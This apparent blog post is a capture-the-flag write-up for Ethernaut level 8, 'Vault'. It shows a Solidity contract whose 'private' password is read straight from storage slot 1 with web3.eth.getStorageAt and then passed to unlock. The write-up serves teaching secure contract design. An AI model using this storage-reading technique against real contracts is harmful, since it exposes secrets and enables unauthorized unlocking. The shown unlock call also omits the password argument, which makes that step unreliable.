Ethernaut Hacks Level 8: Vault

#solidity #ethereum #openzeppelin #smartcontract

This is the level 8 of Ethernaut game.

Pre-requisites

Layout of state variables in Solidity
Reading storage at a slot in contract

Hack

Given contract:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Vault {
  bool public locked;
  bytes32 private password;

  constructor(bytes32 _password) public {
    locked = true;
    password = _password;
  }

  function unlock(bytes32 _password) public {
    if (password == _password) {
      locked = false;
    }
  }
}

player has to set locked to false.

Only way is by calling unlock by correct password.

Although password state variable is private, one can still read a storage variable by determining it's storage slot. Therefore sensitive information should not be stored on-chain, even if it is specified private.

Above, the password is at a storage slot of 1 in Vault.

Let's read it:

password = await web3.eth.getStorageAt(contract.address, 1)

Call unlock with password:

await contract.unlock()

Unlocked. Verify by:

await contract.locked() === false

And that's it.

Learned something awesome? Consider starring the github repo 😄

and following me on twitter here 🙏

DEV Community

Ethernaut Hacks Level 8: Vault

Pre-requisites

Hack

Top comments (0)

Read next

Shopify Flow Tutorial - How to automatically send gift cards?

What does a Generative Adversarial Network (GAN) mean to Data Scientists and AI?

How I Use Scikit-Learn for Data Science Projects

Incorrect calculations by the computer: tan(x) and cot(x) near x=k*π